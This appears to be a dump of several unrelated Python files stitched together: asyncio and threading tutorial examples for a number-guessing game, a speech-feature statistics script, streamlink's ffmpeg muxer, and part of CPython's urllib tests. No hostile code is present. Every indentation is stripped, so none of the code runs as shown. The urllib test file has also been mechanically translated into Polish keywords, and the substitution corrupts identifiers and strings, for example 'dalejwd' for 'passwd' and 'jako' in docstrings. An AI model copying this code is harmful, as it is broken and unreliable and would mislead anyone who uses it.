# Example 10: Reports whether a guess is warmer or colder.
def report_outcome(self, number):
new_distance = math.fabs(number - self.secret)
decision = UNSURE
if new_distance == 0:
decision = CORRECT
elif self.last_distance is None:
pass
elif new_distance < self.last_distance:
decision = WARMER
elif new_distance > self.last_distance:
decision = COLDER
self.last_distance = new_distance
self.send(f'REPORT {decision}')
return decision
# Example 11: Run the server.
import socket
from threading import Thread
def handle_connection(connection):
with connection:
session = Session(connection)
try:
session.loop()
except EOFError:
pass
def run_server(address):
with socket.socket() as listener:
# Allow the port to be reused
listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
listener.bind(address)
listener.listen()
while True:
connection, _ = listener.accept()
thread = Thread(target=handle_connection,
args=(connection,),
daemon=True)
thread.start()
# Example 12: The client runs in the main thread and returns the results.
def run_client(address):
with socket.create_connection(address) as connection:
client = Client(connection)
with client.session(1, 5, 3):
results = [(x, client.report_outcome(x))
for x in client.request_numbers(5)]
with client.session(10, 15, 12):
for number in client.request_numbers(5):
outcome = client.report_outcome(number)
results.append((number, outcome))
return results
# Example 13: Put everything together in main() and check if it works.
def main():
address = ('127.0.0.1', 1234)
server_thread = Thread(
target=run_server, args=(address,), daemon=True)
server_thread.start()
results = run_client(address)
for number, outcome in results:
print(f'Client: {number} is {outcome}')
main()
print('********* End of program using threading *********')
# Example 14: Now we refactor the code to use asyncio
# First we update ConnectionBase to provide coroutines.
class AsyncConnectionBase:
def __init__(self, reader, writer): # Changed
self.reader = reader # Changed
self.writer = writer # Changed
async def send(self, command):
line = command + '\n'
data = line.encode()
self.writer.write(data) # Changed
await self.writer.drain() # Changed
async def receive(self):
line = await self.reader.readline() # Changed
if not line:
raise EOFError('Connection closed')
return line[:-1].decode()
# Example 15: Create a session class for a single connection.
class AsyncSession(AsyncConnectionBase): # Changed
def __init__(self, *args):
super().__init__(*args)
self._clear_values(None, None)
def _clear_values(self, lower, upper):
self.lower = lower
self.upper = upper
self.secret = None
self.guesses = []
# Example 16: Need to add the await keyword
async def loop(self): # Changed
while command := await self.receive(): # Changed
parts = command.split(' ')
if parts[0] == 'PARAMS':
self.set_params(parts)
elif parts[0] == 'NUMBER':
await self.send_number() # Changed
elif parts[0] == 'REPORT':
self.receive_report(parts)
else:
raise UnknownCommandError(command)
# Example 17
def set_params(self, parts):
assert len(parts) == 3
lower = int(parts[1])
upper = int(parts[2])
self._clear_values(lower, upper)
# Example 18: Add async and await keywords
def next_guess(self):
if self.secret is not None:
return self.secret
while True:
guess = random.randint(self.lower, self.upper)
if guess not in self.guesses:
return guess
async def send_number(self): # Changed
guess = self.next_guess()
self.guesses.append(guess)
await self.send(format(guess)) # Changed
# Example 19
def receive_report(self, parts):
assert len(parts) == 2
decision = parts[1]
last = self.guesses[-1]
if decision == CORRECT:
self.secret = last
print(f'Server: {last} is {decision}')
# Example 20: Need to inherit from AsyncConnectionBase
class AsyncClient(AsyncConnectionBase): # Changed
def __init__(self, *args):
super().__init__(*args)
self._clear_state()
def _clear_state(self):
self.secret = None
self.last_distance = None
# Example 21: Need to use async context manager.
@contextlib.asynccontextmanager # Changed
async def session(self, lower, upper, secret): # Changed
print(f'Guess a number between {lower} and {upper}!'
f' Shhhhh, it\'s {secret}.')
self.secret = secret
await self.send(f'PARAMS {lower} {upper}') # Changed
try:
yield
finally:
self._clear_state()
await self.send('PARAMS 0 -1') # Changed
# Example 22
async def request_numbers(self, count): # Changed
for _ in range(count):
await self.send('NUMBER') # Changed
data = await self.receive() # Changed
yield int(data)
if self.last_distance == 0:
return
# Example 23
async def report_outcome(self, number): # Changed
new_distance = math.fabs(number - self.secret)
decision = UNSURE
if new_distance == 0:
decision = CORRECT
elif self.last_distance is None:
pass
elif new_distance < self.last_distance:
decision = WARMER
elif new_distance > self.last_distance:
decision = COLDER
self.last_distance = new_distance
await self.send(f'REPORT {decision}') # Changed
# Make it so the output printing is in
# the same order as the threaded version.
await asyncio.sleep(0.01)
return decision
# Example 24: Need to rewrite the code that runs the server.
import asyncio
async def handle_async_connection(reader, writer):
session = AsyncSession(reader, writer)
try:
await session.loop()
except EOFError:
pass
async def run_async_server(address):
server = await asyncio.start_server(
handle_async_connection, *address)
async with server:
await server.serve_forever()
# Example 25: Async keywords needed here throughout
async def run_async_client(address):
# Wait for the server to listen before trying to connect
await asyncio.sleep(0.1)
streams = await asyncio.open_connection(*address) # New
client = AsyncClient(*streams) # New
async with client.session(1, 5, 3):
results = [(x, await client.report_outcome(x))
async for x in client.request_numbers(5)]
async with client.session(10, 15, 12):
async for number in client.request_numbers(5):
outcome = await client.report_outcome(number)
results.append((number, outcome))
_, writer = streams # New
writer.close() # New
await writer.wait_closed() # New
return results
# Example 26: Use asyncio.create_task to glue the pieces together.
async def main_async():
address = ('127.0.0.1', 4321)
server = run_async_server(address)
asyncio.create_task(server)
results = await run_async_client(address)
for number, outcome in results:
print(f'Client: {number} is {outcome}')
logging.getLogger().setLevel(logging.ERROR)
asyncio.run(main_async())
logging.getLogger().setLevel(logging.DEBUG)
print('********* End of program using coroutines *********')
|
calc_stats.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2020 Patrick Lumban Tobing (Nagoya University)
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
from __future__ import print_function
import argparse
import multiprocessing as mp
import logging
import os
import numpy as np
from sklearn.preprocessing import StandardScaler
from utils import check_hdf5
from utils import read_hdf5
from utils import read_txt
from utils import write_hdf5
from multiprocessing import Array
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"--feats", default=None, required=True,
help="name of the list of hdf5 files")
parser.add_argument(
"--stats", default=None, required=True,
help="filename of stats for hdf5 format")
parser.add_argument("--expdir", required=True,
type=str, help="directory to save the log")
parser.add_argument("--mcep_dim", default=50,
type=int, help="dimension of mel-cepstrum")
parser.add_argument(
"--n_jobs", default=10,
type=int, help="number of parallel jobs")
parser.add_argument(
"--verbose", default=1,
type=int, help="log message level")
args = parser.parse_args()
# set log level
if args.verbose == 1:
logging.basicConfig(level=logging.INFO,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
elif args.verbose > 1:
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
else:
logging.basicConfig(level=logging.WARN,
format='%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s',
datefmt='%m/%d/%Y %I:%M:%S',
filename=args.expdir + "/calc_stats.log")
logging.getLogger().addHandler(logging.StreamHandler())
logging.warn("logging is disabled.")
# read list and define scaler
filenames = read_txt(args.feats)
logging.info("number of training utterances = "+str(len(filenames)))
def calc_stats(filenames, cpu, feat_mceplf0cap_list, feat_orglf0_list, varmcep_list, f0_list, melsp_list, varmelsp_list):
feat_mceplf0cap_arr = None
feat_orglf0_arr = None
varmcep_arr = None
f0_arr = None
melsp_arr = None
varmelsp_arr = None
count = 0
# process all of the data
for filename in filenames:
logging.info(filename)
feat_mceplf0cap = read_hdf5(filename, "/feat_mceplf0cap")
logging.info(feat_mceplf0cap.shape)
feat_orglf0 = read_hdf5(filename, "/feat_org_lf0")
logging.info(feat_orglf0.shape)
melsp = read_hdf5(filename, "/log_1pmelmagsp")
logging.info(melsp.shape)
if feat_mceplf0cap_arr is not None:
feat_mceplf0cap_arr = np.r_[feat_mceplf0cap_arr, feat_mceplf0cap]
else:
feat_mceplf0cap_arr = feat_mceplf0cap
if feat_orglf0_arr is not None:
feat_orglf0_arr = np.r_[feat_orglf0_arr, feat_orglf0]
else:
feat_orglf0_arr = feat_orglf0
logging.info('feat')
logging.info(feat_mceplf0cap_arr.shape)
logging.info(feat_orglf0_arr.shape)
if varmcep_arr is not None:
varmcep_arr = np.r_[varmcep_arr, np.var(feat_mceplf0cap[:,-args.mcep_dim:], axis=0, keepdims=True)]
else:
varmcep_arr = np.var(feat_mceplf0cap[:,-args.mcep_dim:], axis=0, keepdims=True)
logging.info('var')
logging.info(varmcep_arr.shape)
logging.info('f0')
f0 = read_hdf5(filename, "/f0_range")
logging.info(f0.shape)
logging.info('f0 > 0')
f0 = f0[np.nonzero(f0)]
logging.info(f0.shape)
if f0_arr is not None:
f0_arr = np.r_[f0_arr, f0]
else:
f0_arr = f0
logging.info(f0_arr.shape)
if melsp_arr is not None:
melsp_arr = np.r_[melsp_arr, melsp]
else:
melsp_arr = melsp
logging.info(melsp_arr.shape)
if varmelsp_arr is not None:
varmelsp_arr = np.r_[varmelsp_arr, np.var((np.exp(melsp)-1)/10000, axis=0, keepdims=True)]
else:
varmelsp_arr = np.var((np.exp(melsp)-1)/10000, axis=0, keepdims=True)
logging.info('var')
logging.info(varmelsp_arr.shape)
count += 1
logging.info("cpu %d %d %d %d %d %d %d %d" % (cpu, count, len(feat_mceplf0cap_arr), len(feat_orglf0_arr), len(varmcep_arr), len(f0_arr), len(melsp_arr), len(varmelsp_arr)))
#if count >= 5:
# break
feat_mceplf0cap_list.append(feat_mceplf0cap_arr)
feat_orglf0_list.append(feat_orglf0_arr)
varmcep_list.append(varmcep_arr)
f0_list.append(f0_arr)
melsp_list.append(melsp_arr)
varmelsp_list.append(varmelsp_arr)
# divide the file list across jobs
feat_lists = np.array_split(filenames, args.n_jobs)
feat_lists = [f_list.tolist() for f_list in feat_lists]
for i in range(len(feat_lists)):
logging.info("%d %d" % (i+1, len(feat_lists[i])))
# multi processing
with mp.Manager() as manager:
processes = []
feat_mceplf0cap_list = manager.list()
feat_orglf0_list = manager.list()
varmcep_list = manager.list()
f0_list = manager.list()
melsp_list = manager.list()
varmelsp_list = manager.list()
for i, feat_list in enumerate(feat_lists):
p = mp.Process(target=calc_stats, args=(feat_list, i+1, feat_mceplf0cap_list, feat_orglf0_list, varmcep_list, f0_list, melsp_list, varmelsp_list,))
p.start()
processes.append(p)
# wait for all processes
for p in processes:
p.join()
feat_mceplf0cap = None
for i in range(len(feat_mceplf0cap_list)):
if feat_mceplf0cap_list[i] is not None:
logging.info(i)
logging.info(feat_mceplf0cap_list[i].shape)
if feat_mceplf0cap is not None:
feat_mceplf0cap = np.r_[feat_mceplf0cap, feat_mceplf0cap_list[i]]
else:
feat_mceplf0cap = feat_mceplf0cap_list[i]
logging.info('feat mceplf0cap: %d' % (len(feat_mceplf0cap)))
logging.info(feat_mceplf0cap.shape)
feat_orglf0 = None
for i in range(len(feat_orglf0_list)):
if feat_orglf0_list[i] is not None:
logging.info(i)
logging.info(feat_orglf0_list[i].shape)
if feat_orglf0 is not None:
feat_orglf0 = np.r_[feat_orglf0, feat_orglf0_list[i]]
else:
feat_orglf0 = feat_orglf0_list[i]
logging.info('feat orglf0: %d' % (len(feat_orglf0)))
logging.info(feat_orglf0.shape)
var_range = None
for i in range(len(varmcep_list)):
if varmcep_list[i] is not None:
logging.info(i)
logging.info(varmcep_list[i].shape)
if var_range is not None:
var_range = np.r_[var_range, varmcep_list[i]]
else:
var_range = varmcep_list[i]
logging.info('var mcep: %d' % (len(var_range)))
logging.info(var_range.shape)
f0s_range = None
for i in range(len(f0_list)):
if f0_list[i] is not None:
logging.info(i)
logging.info(f0_list[i].shape)
if f0s_range is not None:
f0s_range = np.r_[f0s_range, f0_list[i]]
else:
f0s_range = f0_list[i]
logging.info('f0: %d' % (len(f0s_range)))
logging.info(f0s_range.shape)
melsp = None
for i in range(len(melsp_list)):
if melsp_list[i] is not None:
logging.info(i)
logging.info(melsp_list[i].shape)
if melsp is not None:
melsp = np.r_[melsp, melsp_list[i]]
else:
melsp = melsp_list[i]
logging.info('melsp: %d' % (len(melsp)))
logging.info(melsp.shape)
var_melsp = None
for i in range(len(varmelsp_list)):
if varmelsp_list[i] is not None:
logging.info(i)
logging.info(varmelsp_list[i].shape)
if var_melsp is not None:
var_melsp = np.r_[var_melsp, varmelsp_list[i]]
else:
var_melsp = varmelsp_list[i]
logging.info('var melsp: %d' % (len(var_melsp)))
logging.info(var_melsp.shape)
scaler_feat_mceplf0cap = StandardScaler()
scaler_feat_orglf0 = StandardScaler()
scaler_feat_mceplf0cap.partial_fit(feat_mceplf0cap)
scaler_feat_orglf0.partial_fit(feat_orglf0)
scaler_melsp = StandardScaler()
scaler_melsp.partial_fit(melsp)
mean_feat_mceplf0cap = scaler_feat_mceplf0cap.mean_
scale_feat_mceplf0cap = scaler_feat_mceplf0cap.scale_
mean_feat_orglf0 = scaler_feat_orglf0.mean_
scale_feat_orglf0 = scaler_feat_orglf0.scale_
gv_range_mean = np.mean(np.array(var_range), axis=0)
gv_range_var = np.var(np.array(var_range), axis=0)
logging.info(gv_range_mean)
logging.info(gv_range_var)
f0_range_mean = np.mean(f0s_range)
f0_range_std = np.std(f0s_range)
logging.info(f0_range_mean)
logging.info(f0_range_std)
lf0_range_mean = np.mean(np.log(f0s_range))
lf0_range_std = np.std(np.log(f0s_range))
logging.info(lf0_range_mean)
logging.info(lf0_range_std)
logging.info(mean_feat_mceplf0cap)
logging.info(scale_feat_mceplf0cap)
write_hdf5(args.stats, "/mean_feat_mceplf0cap", mean_feat_mceplf0cap)
write_hdf5(args.stats, "/scale_feat_mceplf0cap", scale_feat_mceplf0cap)
logging.info(mean_feat_orglf0)
logging.info(scale_feat_orglf0)
write_hdf5(args.stats, "/mean_feat_org_lf0", mean_feat_orglf0)
write_hdf5(args.stats, "/scale_feat_org_lf0", scale_feat_orglf0)
write_hdf5(args.stats, "/gv_range_mean", gv_range_mean)
write_hdf5(args.stats, "/gv_range_var", gv_range_var)
write_hdf5(args.stats, "/f0_range_mean", f0_range_mean)
write_hdf5(args.stats, "/f0_range_std", f0_range_std)
write_hdf5(args.stats, "/lf0_range_mean", lf0_range_mean)
write_hdf5(args.stats, "/lf0_range_std", lf0_range_std)
mean_melsp = scaler_melsp.mean_
scale_melsp = scaler_melsp.scale_
gv_melsp_mean = np.mean(np.array(var_melsp), axis=0)
gv_melsp_var = np.var(np.array(var_melsp), axis=0)
logging.info(gv_melsp_mean)
logging.info(gv_melsp_var)
logging.info(mean_melsp)
logging.info(scale_melsp)
write_hdf5(args.stats, "/mean_melsp", mean_melsp)
write_hdf5(args.stats, "/scale_melsp", scale_melsp)
write_hdf5(args.stats, "/gv_melsp_mean", gv_melsp_mean)
write_hdf5(args.stats, "/gv_melsp_var", gv_melsp_var)
if __name__ == "__main__":
main()
|
ffmpegmux.py
|
import logging
import subprocess
import sys
import threading
from streamlink import StreamError
from streamlink.compat import devnull, which
from streamlink.stream.stream import Stream, StreamIO
from streamlink.utils.named_pipe import NamedPipe, NamedPipeBase
log = logging.getLogger(__name__)
class MuxedStream(Stream):
__shortname__ = "muxed-stream"
def __init__(self, session, *substreams, **options):
super(MuxedStream, self).__init__(session)
self.substreams = substreams
self.subtitles = options.pop("subtitles", {})
self.options = options
def open(self):
fds = []
metadata = self.options.get("metadata", {})
maps = self.options.get("maps", [])
# only update the maps values if they haven't been set
update_maps = not maps
for i, substream in enumerate(self.substreams):
log.debug("Opening {0} substream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
for i, subtitle in enumerate(self.subtitles.items()):
language, substream = subtitle
log.debug("Opening {0} subtitle stream".format(substream.shortname()))
if update_maps:
maps.append(len(fds))
fds.append(substream and substream.open())
metadata["s:s:{0}".format(i)] = ["language={0}".format(language)]
self.options["metadata"] = metadata
self.options["maps"] = maps
return FFMPEGMuxer(self.session, *fds, **self.options).open()
@classmethod
def is_usable(cls, session):
return FFMPEGMuxer.is_usable(session)
class FFMPEGMuxer(StreamIO):
__commands__ = ['ffmpeg', 'ffmpeg.exe', 'avconv', 'avconv.exe']
DEFAULT_OUTPUT_FORMAT = "matroska"
DEFAULT_VIDEO_CODEC = "copy"
DEFAULT_AUDIO_CODEC = "copy"
@staticmethod
def copy_to_pipe(stream, pipe):
# type: (StreamIO, NamedPipeBase)
log.debug("Starting copy to pipe: {0}".format(pipe.path))
pipe.open()
while not stream.closed:
try:
data = stream.read(8192)
if len(data):
pipe.write(data)
else:
break
except (IOError, OSError):
log.error("Pipe copy aborted: {0}".format(pipe.path))
break
try:
pipe.close()
except (IOError, OSError): # might fail closing, but that should be ok for the pipe
pass
log.debug("Pipe copy complete: {0}".format(pipe.path))
def __init__(self, session, *streams, **options):
if not self.is_usable(session):
raise StreamError("cannot use FFMPEG")
self.session = session
self.process = None
self.streams = streams
self.pipes = [NamedPipe() for _ in self.streams]
self.pipe_threads = [threading.Thread(target=self.copy_to_pipe, args=(stream, np))
for stream, np in
zip(self.streams, self.pipes)]
ofmt = session.options.get("ffmpeg-fout") or options.pop("format", self.DEFAULT_OUTPUT_FORMAT)
outpath = options.pop("outpath", "pipe:1")
videocodec = session.options.get("ffmpeg-video-transcode") or options.pop("vcodec", self.DEFAULT_VIDEO_CODEC)
audiocodec = session.options.get("ffmpeg-audio-transcode") or options.pop("acodec", self.DEFAULT_AUDIO_CODEC)
metadata = options.pop("metadata", {})
maps = options.pop("maps", [])
copyts = session.options.get("ffmpeg-copyts") or options.pop("copyts", False)
start_at_zero = session.options.get("ffmpeg-start-at-zero") or options.pop("start_at_zero", False)
self._cmd = [self.command(session), '-nostats', '-y']
for np in self.pipes:
self._cmd.extend(["-i", np.path])
self._cmd.extend(['-c:v', videocodec])
self._cmd.extend(['-c:a', audiocodec])
add_audio = options.pop("add_audio", False)
for m in maps:
if not m and add_audio:
self._cmd.extend(["-map", "0:v:0"])
else:
self._cmd.extend(["-map", str(m)])
if copyts:
self._cmd.extend(["-copyts"])
if start_at_zero:
self._cmd.extend(["-start_at_zero"])
for stream, data in metadata.items():
for datum in data:
stream_id = ":{0}".format(stream) if stream else ""
self._cmd.extend(["-metadata{0}".format(stream_id), datum])
self._cmd.extend(['-f', ofmt, outpath])
log.debug("ffmpeg command: {0}".format(' '.join(self._cmd)))
self.close_errorlog = False
if session.options.get("ffmpeg-verbose"):
self.errorlog = sys.stderr
elif session.options.get("ffmpeg-verbose-path"):
self.errorlog = open(session.options.get("ffmpeg-verbose-path"), "w")
self.close_errorlog = True
else:
self.errorlog = devnull()
def open(self):
for t in self.pipe_threads:
t.daemon = True
t.start()
self.process = subprocess.Popen(self._cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=self.errorlog)
return self
@classmethod
def is_usable(cls, session):
return cls.command(session) is not None
@classmethod
def command(cls, session):
command = []
if session.options.get("ffmpeg-ffmpeg"):
command.append(session.options.get("ffmpeg-ffmpeg"))
for cmd in command or cls.__commands__:
if which(cmd):
return cmd
def read(self, size=-1):
data = self.process.stdout.read(size)
return data
def close(self):
if self.closed:
return
log.debug("Closing ffmpeg thread")
if self.process:
# kill ffmpeg
self.process.kill()
self.process.stdout.close()
# close the streams
for stream in self.streams:
if hasattr(stream, "close") and callable(stream.close):
stream.close()
log.debug("Closed all the substreams")
if self.close_errorlog:
self.errorlog.close()
self.errorlog = None
super(FFMPEGMuxer, self).close()
|
test_urllib.py
|
"""Regresssion tests dla urllib"""
zaimportuj urllib.parse
zaimportuj urllib.request
zaimportuj urllib.error
zaimportuj http.client
zaimportuj email.message
zaimportuj io
zaimportuj unittest
z unittest.mock zaimportuj patch
z test zaimportuj support
zaimportuj os
spróbuj:
zaimportuj ssl
wyjąwszy ImportError:
ssl = Nic
zaimportuj sys
zaimportuj tempfile
z nturl2path zaimportuj url2pathname, pathname2url
z base64 zaimportuj b64encode
zaimportuj collections
def hexescape(char):
"""Escape char jako RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
jeżeli len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
zwróć "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = Nic
def urlopen(url, data=Nic, proxies=Nic):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
jeżeli proxies jest nie Nic:
opener = urllib.request.FancyURLopener(proxies=proxies)
albo_inaczej nie _urlopener:
przy support.check_warnings(
('FancyURLopener style of invoking requests jest deprecated.',
DeprecationWarning)):
opener = urllib.request.FancyURLopener()
_urlopener = opener
inaczej:
opener = _urlopener
jeżeli data jest Nic:
zwróć opener.open(url)
inaczej:
zwróć opener.open(url, data)
def fakehttp(fakedata):
klasa FakeSocket(io.BytesIO):
io_refs = 1
def sendall(self, data):
FakeHTTPConnection.buf = data
def makefile(self, *args, **kwds):
self.io_refs += 1
zwróć self
def read(self, amt=Nic):
jeżeli self.closed:
zwróć b""
zwróć io.BytesIO.read(self, amt)
def readline(self, length=Nic):
jeżeli self.closed:
zwróć b""
zwróć io.BytesIO.readline(self, length)
def close(self):
self.io_refs -= 1
jeżeli self.io_refs == 0:
io.BytesIO.close(self)
klasa FakeHTTPConnection(http.client.HTTPConnection):
# buffer to store data for verification in urlopen tests.
buf = Nic
fakesock = FakeSocket(fakedata)
def connect(self):
self.sock = self.fakesock
zwróć FakeHTTPConnection
klasa FakeHTTPMixin(object):
def fakehttp(self, fakedata):
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = fakehttp(fakedata)
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
klasa FakeFTPMixin(object):
def fakeftp(self):
klasa FakeFtpWrapper(object):
def __init__(self, user, dalejwd, host, port, dirs, timeout=Nic,
persistent=Prawda):
dalej
def retrfile(self, file, type):
zwróć io.BytesIO(), 0
def close(self):
dalej
self._ftpwrapper_class = urllib.request.ftpwrapper
urllib.request.ftpwrapper = FakeFtpWrapper
def unfakeftp(self):
urllib.request.ftpwrapper = self._ftpwrapper_class
klasa urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test jako much functionality jako possible so jako to cut down on reliance
on connecting to the Net dla testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
spróbuj:
f.write(self.text)
w_końcu:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
dla attr w ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertPrawda(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" zwróć an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertIsInstance(file_num, int, "fileno() did nie zwróć an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did nie zwróć the expected text")
def test_close(self):
# Test close() by calling it here and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertIsInstance(self.returned_obj.info(), email.message.Message)
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNic(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison.
# Use the iterator in the usual implicit way to test for ticket #4608.
dla line w self.returned_obj:
self.assertEqual(line, self.text)
def test_relativelocalfile(self):
self.assertRaises(ValueError,urllib.request.urlopen,'./' + self.pathname)
klasa ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
dla k w list(os.environ):
jeżeli 'proxy' w k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
usuń self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment uses lowercased, truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
# List of no_proxies with spaces.
self.env.set('NO_PROXY', 'localhost, anotherdomain.com, newdomain.com')
self.assertPrawda(urllib.request.proxy_bypass_environment('anotherdomain.com'))
klasa urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
spróbuj:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
spróbuj:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
w_końcu:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
spróbuj:
resp = urlopen("http://www.python.org")
self.assertPrawda(resp.fp.will_close)
w_końcu:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but nie "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
spróbuj:
self.assertRaises(OSError, urlopen, "http://python.org/")
w_końcu:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
spróbuj:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
w_końcu:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
spróbuj:
self.assertRaises(OSError, urlopen, "http://something")
w_końcu:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertPrawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
spróbuj:
self.assertPrawda(os.path.exists(tmp_file))
przy urlopen(tmp_fileurl) jako fobj:
self.assertPrawda(fobj)
w_końcu:
os.close(fd)
os.unlink(tmp_file)
self.assertNieprawda(os.path.exists(tmp_file))
przy self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen(test_ftp_url)
self.assertNieprawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
def test_ftp_nonexisting(self):
przy self.assertRaises(urllib.error.URLError) jako e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertNieprawda(e.exception.filename)
self.assertPrawda(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
spróbuj:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
w_końcu:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
spróbuj:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
spróbuj:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in the URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
w_końcu:
self.unfakehttp()
def test_URLopener_deprecation(self):
przy support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
przy self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
klasa urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
